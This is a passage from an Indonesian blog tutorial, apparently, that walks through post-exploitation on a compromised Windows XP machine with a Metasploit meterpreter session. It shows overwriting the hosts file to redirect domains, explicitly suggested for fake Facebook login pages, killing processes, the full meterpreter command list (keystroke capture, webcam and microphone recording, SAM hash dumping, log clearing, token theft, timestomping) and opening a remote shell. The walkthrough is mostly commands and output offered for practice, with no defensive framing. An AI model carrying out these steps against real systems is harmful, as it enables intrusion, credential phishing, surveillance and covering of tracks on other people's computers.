100666/rw-rw-rw- 9306 fil 2001-08-23 20:00:00 +0700 online.wav
100666/rw-rw-rw- 4454 fil 2007-04-03 12:37:28 +0700 type.wav
100666/rw-rw-rw- 115981 fil 2007-04-03 12:34:02 +0700 xpmsgr.chm
Sekarang kita coba melakukan poisoning file hosts dimana kita bisa melakukan DNS dalam windows untuk diarahkan ke alamat IP yang kita mau, yang bisa ditujukan banyak hal, misal fake login facebook dan sebagainya.
meterpreter > cd /windows/system32/drivers/etc/
meterpreter > pwd
C:\windows\system32\drivers\etc
Setelah kita berada di C:\windows\system32\drivers\etc, kita menghapus file hosts terlebih dahulu lalu kita upload file hosts yang baru.
meterpreter > upload -r c:/asa/hosts c:/windows/system32/drivers/etc
[*] uploading : c:/asa/hosts -> c:/windows/system32/drivers/etc
[*] uploaded : c:/asa/hosts -> c:/windows/system32/drivers/etc\hosts
Setelah diupload maka anda dapat menguji dengan ping domain yang telah dimasukkan.
Sekarang kita coba melakukan mematikan proses di windows dengan perintah kill.
>>>ps
Process list
============
PID Name Arch Session User Path
— —- —- ——- —- —-
0 [System Process]
4 System x86 0
624 smss.exe x86 0 NT AUTHORITY\SYSTEM \SystemRoot\System32\smss.exe
696 csrss.exe
720 winlogon.exe x86 0 NT AUTHORITY\SYSTEM \??\C:\WINDOWS\system32\winlogon.exe
764 services.exe x86 0 NT AUTHORITY\SYSTEM C:\WINDOWS\system32\services.exe
776 lsass.exe x86 0 NT AUTHORITY\SYSTEM C:\WINDOWS\system32\lsass.exe
936 DF5Serv.exe x86 0 NT AUTHORITY\SYSTEM C:\Program Files\Faronics\Deep Freeze\Install C-0\DF5Serv.exe
972 svchost.exe x86 0 NT AUTHORITY\SYSTEM C:\WINDOWS\system32\svchost.exe
1068 svchost.exe
1152 svchost.exe x86 0 NT AUTHORITY\SYSTEM C:\WINDOWS\System32\svchost.exe
1292 svchost.exe
1452 svchost.exe
1532 explorer.exe x86 0 PC100\data C:\WINDOWS\Explorer.EXE
1648 spoolsv.exe x86 0 NT AUTHORITY\SYSTEM C:\WINDOWS\system32\spoolsv.exe
1184 wscntfy.exe x86 0 PC100\data C:\WINDOWS\system32\wscntfy.exe
1300 alg.exe
348 FrzState2k.exe x86 0 NT AUTHORITY\SYSTEM C:\Program Files\Faronics\Deep Freeze\Install C-0\_$Df\FrzState2k.exe
2032 cmd.exe x86 0 PC100\data C:\WINDOWS\system32\cmd.exe
188 notepad.exe x86 0 PC100\data C:\WINDOWS\system32\notepad.exe
1176 sc.exe x86 0 PC100\data C:\WINDOWS\system32\sc.exe
1436 sc.exe x86 0 PC100\data C:\WINDOWS\system32\sc.exe
596 mshta.exe x86 0 PC100\data C:\WINDOWS\system32\mshta.exe
1556 mmc.exe x86 0 PC100\data C:\WINDOWS\system32\mmc.exe
1040 sc.exe x86 0 PC100\data C:\WINDOWS\system32\sc.exe
336 logon.scr x86 0 PC100\data C:\WINDOWS\System32\logon.scr
Kita coba kill aplikasi cmd.exe
>>>kill 2032
Killing: 2032
>>>ps
Process list
============
PID Name Arch Session User Path
— —- —- ——- —- —-
0 [System Process]
4 System x86 0
624 smss.exe x86 0 NT AUTHORITY\SYSTEM \SystemRoot\System32\smss.exe
696 csrss.exe
720 winlogon.exe x86 0 NT AUTHORITY\SYSTEM \??\C:\WINDOWS\system32\winlogon.exe
764 services.exe x86 0 NT AUTHORITY\SYSTEM C:\WINDOWS\system32\services.exe
776 lsass.exe x86 0 NT AUTHORITY\SYSTEM C:\WINDOWS\system32\lsass.exe
936 DF5Serv.exe x86 0 NT AUTHORITY\SYSTEM C:\Program Files\Faronics\Deep Freeze\Install C-0\DF5Serv.exe
972 svchost.exe x86 0 NT AUTHORITY\SYSTEM C:\WINDOWS\system32\svchost.exe
1068 svchost.exe
1152 svchost.exe x86 0 NT AUTHORITY\SYSTEM C:\WINDOWS\System32\svchost.exe
1292 svchost.exe
1452 svchost.exe
1532 explorer.exe x86 0 PC100\data C:\WINDOWS\Explorer.EXE
1648 spoolsv.exe x86 0 NT AUTHORITY\SYSTEM C:\WINDOWS\system32\spoolsv.exe
1184 wscntfy.exe x86 0 PC100\data C:\WINDOWS\system32\wscntfy.exe
1300 alg.exe
348 FrzState2k.exe x86 0 NT AUTHORITY\SYSTEM C:\Program Files\Faronics\Deep Freeze\Install C-0\_$Df\FrzState2k.exe
188 notepad.exe x86 0 PC100\data C:\WINDOWS\system32\notepad.exe
1176 sc.exe x86 0 PC100\data C:\WINDOWS\system32\sc.exe
1436 sc.exe x86 0 PC100\data C:\WINDOWS\system32\sc.exe
596 mshta.exe x86 0 PC100\data C:\WINDOWS\system32\mshta.exe
1556 mmc.exe x86 0 PC100\data C:\WINDOWS\system32\mmc.exe
1040 sc.exe x86 0 PC100\data C:\WINDOWS\system32\sc.exe
336 logon.scr x86 0 PC100\data C:\WINDOWS\System32\logon.scr
Kita perhatikan diatas, PID 2032, cmd.exe telah hilang dalam proses.
C:\windows\system32\drivers\etc>
Karena masih banyak perintah-perintah meterpreter maka silahkan coba-coba sendiri aja, untuk membantu anda ketik saja help lalu enter untuk memandu anda menjalankan meterpreter di metasploit framework.
>>>help
Core Commands
=============
Command Description
——- ———–
? Help menu
background Backgrounds the current session
bgkill Kills a background meterpreter script
bglist Lists running background scripts
bgrun Executes a meterpreter script as a background thread
channel Displays information about active channels
close Closes a channel
detach Detach the meterpreter session (for http/https)
disable_unicode_encoding Disables encoding of unicode strings
enable_unicode_encoding Enables encoding of unicode strings
exit Terminate the meterpreter session
help Help menu
info Displays information about a Post module
interact Interacts with a channel
irb Drop into irb scripting mode
load Load one or more meterpreter extensions
migrate Migrate the server to another process
quit Terminate the meterpreter session
read Reads data from a channel
resource Run the commands stored in a file
run Executes a meterpreter script or Post module
use Deprecated alias for ‘load’
write Writes data to a channel
Stdapi: File system Commands
============================
Command Description
——- ———–
cat Read the contents of a file to the screen
cd Change directory
del Delete the specified file
download Download a file or directory
edit Edit a file
getlwd Print local working directory
getwd Print working directory
lcd Change local working directory
lpwd Print local working directory
ls List files
mkdir Make directory
pwd Print working directory
rm Delete the specified file
rmdir Remove directory
search Search for files
upload Upload a file or directory
Stdapi: Networking Commands
===========================
Command Description
——- ———–
ipconfig Display interfaces
portfwd Forward a local port to a remote service
route View and modify the routing table
Stdapi: System Commands
=======================
Command Description
——- ———–
clearev Clear the event log
drop_token Relinquishes any active impersonation token.
execute Execute a command
getpid Get the current process identifier
getprivs Attempt to enable all privileges available to the current process
getuid Get the user that the server is running as
kill Terminate a process
ps List running processes
reboot Reboots the remote computer
reg Modify and interact with the remote registry
rev2self Calls RevertToSelf() on the remote machine
shell Drop into a system command shell
shutdown Shuts down the remote computer
steal_token Attempts to steal an impersonation token from the target process
sysinfo Gets information about the remote system, such as OS
Stdapi: User interface Commands
===============================
Command Description
——- ———–
enumdesktops List all accessible desktops and window stations
getdesktop Get the current meterpreter desktop
idletime Returns the number of seconds the remote user has been idle
keyscan_dump Dump the keystroke buffer
keyscan_start Start capturing keystrokes
keyscan_stop Stop capturing keystrokes
screenshot Grab a screenshot of the interactive desktop
setdesktop Change the meterpreters current desktop
uictl Control some of the user interface components
Stdapi: Webcam Commands
=======================
Command Description
——- ———–
record_mic Record audio from the default microphone for X seconds
webcam_list List webcams
webcam_snap Take a snapshot from the specified webcam
Priv: Elevate Commands
======================
Command Description
——- ———–
getsystem Attempt to elevate your privilege to that of local system.
Priv: Password database Commands
================================
Command Description
——- ———–
hashdump Dumps the contents of the SAM database
Priv: Timestomp Commands
========================
Command Description
——- ———–
timestomp Manipulate file MACE attributes
Jika sudah bosan dengan bermain meterpreter maka dapat langsung ke shell saja, cukup mengetikkan shell lalu enter.
meterpreter > shell
Process 1692 created.
Channel 7 created.
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.
C:\windows\system32\drivers\etc>
0 komentar:
Posting Komentar